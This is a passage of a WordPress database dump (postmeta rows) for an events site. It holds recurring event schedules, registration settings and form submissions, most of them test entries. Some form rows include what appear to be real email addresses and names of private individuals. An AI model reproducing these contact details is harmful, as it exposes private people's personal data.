1607512444;s:13:\"_EventShowMap\";i:1607512444;s:13:\"_EventVenueID\";i:1607512444;s:20:\"_EventCurrencySymbol\";i:1607512444;s:22:\"_EventCurrencyPosition\";i:1607512444;s:10:\"_EventCost\";i:1607512444;s:9:\"_EventURL\";i:1607512444;s:14:\"_EventTimezone\";i:1607512444;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512444;s:16:\"tribe_events_cat\";i:1607537644;}'),(117322,262891,'protect_children',''),(117332,262891,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 12:15:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 13:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117316,262891,'_EventStartDate','2021-09-12 12:15:00'),(117300,262890,'_RTECmaxRegistrations','30'),(121085,263203,'_RTECdeadlineType','start'),(121053,263203,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609619822;s:12:\"_EventOrigin\";i:1609619822;s:13:\"_thumbnail_id\";i:1609620137;s:24:\"boldgrid_hide_page_title\";i:1609619822;s:17:\"_EventShowMapLink\";i:1609619822;s:13:\"_EventShowMap\";i:1609619822;s:15:\"_EventStartDate\";i:1609620137;s:13:\"_EventEndDate\";i:1609620137;s:18:\"_EventStartDateUTC\";i:1609620137;s:16:\"_EventEndDateUTC\";i:1609620137;s:14:\"_EventDuration\";i:1609619822;s:20:\"_EventCurrencySymbol\";i:1609619822;s:22:\"_EventCurrencyPosition\";i:1609619822;s:10:\"_EventCost\";i:1609619822;s:9:\"_EventURL\";i:1609619822;s:14:\"_EventTimezone\";i:1609619822;s:18:\"_EventTimezoneAbbr\";i:1609619822;s:27:\"_EventNextPendingRecurrence\";i:1609619822;s:26:\"_RTECregistrationsDisabled\";i:1609619822;s:17:\"_RTECdeadlineType\";i:1609619822;s:19:\"_RTECwhoCanRegister\";i:1609619822;s:23:\"_RTEClimitRegistrations\";i:1609619822;s:21:\"_RTECmaxRegistrations\";i:1609619822;s:16:\"_EventRecurrence\";i:1609619822;s:18:\"_RTECnumRegistered\";i:1609619822;s:13:\"_EventVenueID\";i:1609619822;s:12:\"_dp_original\";i:1609619822;s:16:\"tribe_events_cat\";i:1609645563;s:10:\"_edit_last\";i:1609619907;s:10:\"post_title\";i:1609619907;s:12:\"post_content\";i:1609620363;s:11:\"post_status\";i:1609620137;}'),(117356,262892,'_RTECregistrationsDisabled','1'),(117357,262892,'_RTECdeadlineType','start'),(116325,262811,'_EventURL',''),(116326,262811,'_EventTimezone','America/Denver'),(116327,262811,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262803;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:262804;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:262805;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:262806;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:262807;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:262808;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:262809;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:262810;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:262811;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:262812;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(116322,262811,'_EventCurrencySymbol',''),(116323,262811,'_EventCurrencyPosition','prefix'),(116324,262811,'_EventCost',''),(116320,262811,'_EventShowMap','1'),(116321,262811,'_EventVenueID','262507'),(115035,262811,'_EventEndDate','2021-09-19 10:15:00'),(115036,262811,'_EventEndDateUTC','2021-09-19 16:15:00'),(115037,262811,'_EventDuration','4500'),(116380,262857,'_EventStartDateUTC','2020-12-06 16:00:00'),(116381,262857,'_EventEndDateUTC','2020-12-06 17:15:00'),(116312,262811,'_RTECregistrationsDisabled','1'),(116313,262811,'_RTECdeadlineType','start'),(116314,262811,'_RTECwhoCanRegister','any'),(116315,262811,'_RTEClimitRegistrations','0'),(116310,262811,'_EventOrigin','events-calendar'),(116300,262810,'_EventVenueID','262507'),(116301,262810,'_EventCurrencySymbol',''),(116302,262810,'_EventCurrencyPosition','prefix'),(116303,262810,'_EventCost',''),(116304,262810,'_EventURL',''),(116305,262810,'_EventTimezone','America/Denver'),(116306,262810,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262803;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:262804;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:262805;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:262806;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:262807;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:262808;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:262809;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:262810;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:262811;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:262812;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(116382,262857,'_EventDuration','4500'),(116383,262857,'_EventCurrencySymbol',''),(115007,262810,'_EventDuration','4500'),(115006,262810,'_EventEndDateUTC','2021-08-15 16:15:00'),(115005,262810,'_EventEndDate','2021-08-15 10:15:00'),(115004,262810,'_EventStartDateUTC','2021-08-15 15:00:00'),(115003,262810,'_EventStartDate','2021-08-15 09:00:00'),(117358,262892,'_RTECwhoCanRegister','any'),(117308,262890,'_EventCost',''),(117309,262890,'_EventURL',''),(117310,262890,'_EventTimezone','America/Denver'),(117311,262890,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610280900;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613304900;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615724100;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1618143300;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620562500;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623586500;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1626005700;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628424900;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631448900;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1633868100;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117303,262890,'_EventShowMapLink','1'),(117304,262890,'_EventShowMap','1'),(117305,262890,'_EventVenueID','262507'),(117306,262890,'_EventCurrencySymbol',''),(117307,262890,'_EventCurrencyPosition','prefix'),(151805,266081,'mec_currency','a:0:{}'),(117294,262890,'_EventOrigin','events-calendar'),(117296,262890,'_RTECregistrationsDisabled','1'),(117297,262890,'_RTECdeadlineType','start'),(117298,262890,'_RTECwhoCanRegister','any'),(117299,262890,'_RTEClimitRegistrations','0'),(115103,262814,'_RTEClimitRegistrations','0'),(115104,262814,'_RTECmaxRegistrations','30'),(115105,262814,'boldgrid_hide_page_title','0'),(115063,262812,'_EventStartDate','2021-10-17 09:00:00'),(115064,262812,'_EventStartDateUTC','2021-10-17 15:00:00'),(115065,262812,'_EventEndDate','2021-10-17 10:15:00'),(115066,262812,'_EventEndDateUTC','2021-10-17 16:15:00'),(115067,262812,'_EventDuration','4500'),(116379,262857,'_EventEndDate','2020-12-06 10:15:00'),(116307,262811,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536672;}'),(116308,262811,'protect_children',''),(116309,262811,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536672;}'),(117359,262892,'_RTEClimitRegistrations','0'),(117360,262892,'_RTECmaxRegistrations','30'),(116384,262857,'_EventCurrencyPosition','prefix'),(132507,263837,'_field_71','Denver'),(132508,263837,'_field_74','ECK Temple Vahana Leader'),(132509,263837,'_field_75','Test 3'),(132510,263837,'_form_id','8'),(132511,263837,'_seq_num','9'),(132512,263838,'protect_children',''),(132513,263838,'_field_67','test4'),(132514,263838,'_field_68','testing'),(132515,263838,'_field_69','choll.03@comcast.net'),(132516,263838,'_field_70','(555) 555-5555'),(132517,263838,'_field_71','Denver'),(132518,263838,'_field_74','ECK Temple Vahana Leader'),(132519,263838,'_field_75','test 4'),(132520,263838,'_form_id','8'),(132521,263838,'_seq_num','10'),(132522,263839,'protect_children',''),(132523,263839,'_field_67','Test 5'),(132524,263839,'_field_68','Testingagain'),(132525,263839,'_field_69','choll.03@comcast.net'),(132526,263839,'_field_70','(555) 555-5555'),(132527,263839,'_field_71','Denver'),(132528,263839,'_field_74','ECK Temple Vahana Leader'),(132529,263839,'_field_75','Teswting 5'),(132530,263839,'_form_id','8'),(132531,263839,'_seq_num','11'),(132532,263840,'protect_children',''),(132533,263840,'_field_67','Test6'),(132534,263840,'_field_68','Testkng'),(132535,263840,'_field_69','choll.03@comcast.net'),(132536,263840,'_field_70','(555) 555-5555'),(132537,263840,'_field_71','Denver'),(132538,263840,'_field_74','ECK Temple Vahana Leader'),(132539,263840,'_field_75','Testing further'),(132540,263840,'_form_id','8'),(132541,263840,'_seq_num','12'),(132542,263841,'protect_children',''),(132543,263841,'_field_67','Testing 6'),(132544,263841,'_field_68','Testing'),(132545,263841,'_field_69','choll.03@comcast.net'),(132546,263841,'_field_70','(555) 555-5555'),(132547,263841,'_field_71','Denver'),(132548,263841,'_field_74','ECK Temple Vahana Leader'),(132549,263841,'_field_75','adsfasd;gliautoarielkng/lrkdjga\'l4\nadjfadsk\'a;'),(105574,132188,'_edit_lock','1607527943:2'),(105575,132187,'_edit_lock','1620074622:2'),(105576,132185,'_edit_lock','1607528287:2'),(105577,132183,'_edit_lock','1607528450:2'),(117291,262890,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512444;s:12:\"_EventOrigin\";i:1607512444;s:16:\"protect_children\";i:1607512444;s:13:\"_thumbnail_id\";i:1607512444;s:26:\"_RTECregistrationsDisabled\";i:1607512444;s:17:\"_RTECdeadlineType\";i:1607512444;s:19:\"_RTECwhoCanRegister\";i:1607512444;s:23:\"_RTEClimitRegistrations\";i:1607512444;s:21:\"_RTECmaxRegistrations\";i:1607512444;s:16:\"_EventRecurrence\";i:1607512444;s:17:\"_EventShowMapLink\";i:1607512444;s:13:\"_EventShowMap\";i:1607512444;s:13:\"_EventVenueID\";i:1607512444;s:20:\"_EventCurrencySymbol\";i:1607512444;s:22:\"_EventCurrencyPosition\";i:1607512444;s:10:\"_EventCost\";i:1607512444;s:9:\"_EventURL\";i:1607512444;s:14:\"_EventTimezone\";i:1607512444;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512444;s:16:\"tribe_events_cat\";i:1607537644;}'),(117281,262889,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610280900;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613304900;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615724100;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1618143300;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620562500;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623586500;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1626005700;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628424900;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631448900;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1633868100;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117301,262890,'boldgrid_hide_page_title','0'),(117302,262890,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 12:15:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 13:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117293,262890,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512444;s:12:\"_EventOrigin\";i:1607512444;s:16:\"protect_children\";i:1607512444;s:13:\"_thumbnail_id\";i:1607512444;s:26:\"_RTECregistrationsDisabled\";i:1607512444;s:17:\"_RTECdeadlineType\";i:1607512444;s:19:\"_RTECwhoCanRegister\";i:1607512444;s:23:\"_RTEClimitRegistrations\";i:1607512444;s:21:\"_RTECmaxRegistrations\";i:1607512444;s:16:\"_EventRecurrence\";i:1607512444;s:17:\"_EventShowMapLink\";i:1607512444;s:13:\"_EventShowMap\";i:1607512444;s:13:\"_EventVenueID\";i:1607512444;s:20:\"_EventCurrencySymbol\";i:1607512444;s:22:\"_EventCurrencyPosition\";i:1607512444;s:10:\"_EventCost\";i:1607512444;s:9:\"_EventURL\";i:1607512444;s:14:\"_EventTimezone\";i:1607512444;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512444;s:16:\"tribe_events_cat\";i:1607537644;}'),(117292,262890,'protect_children',''),(117286,262890,'_EventStartDate','2021-08-08 12:15:00'),(117287,262890,'_EventStartDateUTC','2021-08-08 18:15:00'),(117288,262890,'_EventEndDate','2021-08-08 13:45:00'),(117289,262890,'_EventEndDateUTC','2021-08-08 19:45:00'),(117290,262890,'_EventDuration','5400'),(116280,262809,'_EventCurrencySymbol',''),(116281,262809,'_EventCurrencyPosition','prefix'),(116282,262809,'_EventCost',''),(116277,262809,'_EventShowMapLink','1'),(116278,262809,'_EventShowMap','1'),(116279,262809,'_EventVenueID','262507'),(114977,262809,'_EventDuration','4500'),(116284,262809,'_EventTimezone','America/Denver'),(116285,262809,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262803;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:262804;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:262805;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:262806;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:262807;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:262808;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:262809;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:262810;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:262811;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:262812;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(114973,262809,'_EventStartDate','2021-07-18 09:00:00'),(114974,262809,'_EventStartDateUTC','2021-07-18 15:00:00'),(114975,262809,'_EventEndDate','2021-07-18 10:15:00'),(116283,262809,'_EventURL',''),(114976,262809,'_EventEndDateUTC','2021-07-18 16:15:00'),(116244,262808,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536671;}'),(116245,262808,'protect_children',''),(116246,262808,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536671;}'),(151813,266081,'mec_hide_time','0'),(115755,262796,'_EventOrigin','events-calendar'),(115757,262796,'_RTECregistrationsDisabled','1'),(115758,262796,'_RTECdeadlineType','start'),(151732,266078,'mec_additional_location_ids','a:0:{}'),(151730,266078,'mec_currency','a:0:{}'),(151731,266078,'mec_additional_organizer_ids','a:0:{}'),(151727,266078,'mec_more_info_title',''),(151728,266078,'mec_more_info_target','_self'),(151729,266078,'mec_cost',''),(132622,263855,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:172341;s:12:\"smushed-size\";i:168171;s:15:\"savings-percent\";d:2.4199999999999999289457264239899814128875732421875;}'),(132623,263858,'protect_children',''),(132624,263858,'_field_67','Test7'),(132625,263858,'_field_68','Testing'),(132626,263858,'_field_69','choll.03@comcast.net'),(132627,263858,'_field_70','(555) 555-5555'),(132628,263858,'_field_71','Denver'),(132629,263858,'_field_74','ECK Temple Vahana Leader'),(132630,263858,'_field_75','Testing\nakdlfha;sldkfhas\nasdlkgaldskg'),(132631,263858,'_form_id','8'),(132632,263858,'_seq_num','14'),(142790,265063,'mec_not_in_days',''),(142791,265063,'mec_hourly_schedules','a:0:{}'),(132636,263859,'protect_children',''),(132637,263859,'_field_67','Test8'),(132638,263859,'_field_68','Testing'),(132639,263859,'_field_69','choll.03@comcast.net'),(132640,263859,'_field_70','(555) 555-5555'),(115737,262795,'_RTECdeadlineType','start'),(115738,262795,'_RTECwhoCanRegister','any'),(115739,262795,'_RTEClimitRegistrations','0'),(115740,262795,'_RTECmaxRegistrations','30'),(115717,262794,'_RTECwhoCanRegister','any'),(115718,262794,'_RTEClimitRegistrations','0'),(115719,262794,'_RTECmaxRegistrations','30'),(115720,262794,'boldgrid_hide_page_title','0'),(115721,262794,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:10:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115736,262795,'_RTECregistrationsDisabled','1'),(119686,262751,'_RTECmaxRegistrations','30'),(119672,262751,'_EventShowMapLink','1'),(132551,263841,'_seq_num','13'),(132550,263841,'_form_id','8'),(131912,263791,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(141070,264874,'_edit_lock','1620244350:2'),(144280,265225,'_field_135','drk.anson@varian.net'),(144279,265225,'_field_134','anson'),(144278,265225,'_field_133','drake'),(144277,265224,'_seq_num','8'),(144276,265224,'_form_id','44'),(144275,265224,'_field_404','AlexaReevesMassey@gmail.com'),(141119,264882,'_form_id','21'),(141120,264882,'_seq_num','124'),(143159,265099,'_field_224','Leanore'),(141122,264450,'_edit_last','2'),(116266,262809,'protect_children',''),(116267,262809,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536671;}'),(116265,262809,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536671;}'),(114605,262796,'_EventEndDateUTC','2021-06-20 16:10:00'),(115767,262796,'_EventCurrencySymbol',''),(114606,262796,'_EventDuration','4200'),(114573,262795,'_EventStartDateUTC','2021-05-16 15:00:00'),(114574,262795,'_EventEndDate','2021-05-16 10:10:00'),(115669,262792,'protect_children',''),(151817,266081,'mec_countdown_method','global'),(115673,262792,'_RTECregistrationsDisabled','1'),(115674,262792,'_RTECdeadlineType','start'),(115675,262792,'_RTECwhoCanRegister','any'),(115676,262792,'_RTEClimitRegistrations','0'),(115677,262792,'_RTECmaxRegistrations','30'),(115671,262792,'_EventOrigin','events-calendar'),(115678,262792,'boldgrid_hide_page_title','0'),(115668,262792,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511404;s:13:\"_thumbnail_id\";i:1607511404;s:26:\"_RTECregistrationsDisabled\";i:1607511404;s:17:\"_RTECdeadlineType\";i:1607511404;s:19:\"_RTECwhoCanRegister\";i:1607511404;s:23:\"_RTEClimitRegistrations\";i:1607511404;s:21:\"_RTECmaxRegistrations\";i:1607511404;s:24:\"boldgrid_hide_page_title\";i:1607511404;s:16:\"_EventRecurrence\";i:1607511404;s:17:\"_EventShowMapLink\";i:1607511404;s:13:\"_EventShowMap\";i:1607511404;s:13:\"_EventVenueID\";i:1607511404;s:20:\"_EventCurrencySymbol\";i:1607511404;s:22:\"_EventCurrencyPosition\";i:1607511404;s:10:\"_EventCost\";i:1607511404;s:9:\"_EventURL\";i:1607511404;s:14:\"_EventTimezone\";i:1607511404;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511404;s:16:\"tribe_events_cat\";i:1607536604;}'),(132654,263860,'_form_id','8'),(132653,263860,'_field_75','agasdgadgasdg'),(132652,263860,'_field_74','Administrative Services'),(132651,263860,'_field_71','Boulder'),(132650,263860,'_field_70','(555) 555-5555'),(132649,263860,'_field_69','choll.03@comcast.net'),(132648,263860,'_field_68','testing'),(132647,263860,'_field_67','test 9'),(132646,263860,'protect_children',''),(132641,263859,'_field_71','Co Springs'),(132642,263859,'_field_74','eck-temple-director'),(132643,263859,'_field_75','Dasgasdgadfgasda'),(132644,263859,'_form_id','8'),(132645,263859,'_seq_num','15'),(131911,263791,'_RTECmaxRegistrations','30'),(10584,123040,'_wp_attached_file','2019/08/spex-accord-6.jpg'),(10585,123040,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:182;s:6:\"height\";i:248;s:4:\"file\";s:25:\"2019/08/spex-accord-6.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"spex-accord-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"spex-accord-6-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"spex-accord-6-132x180.jpg\";s:5:\"width\";i:132;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"spex-accord-6-182x150.jpg\";s:5:\"width\";i:182;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\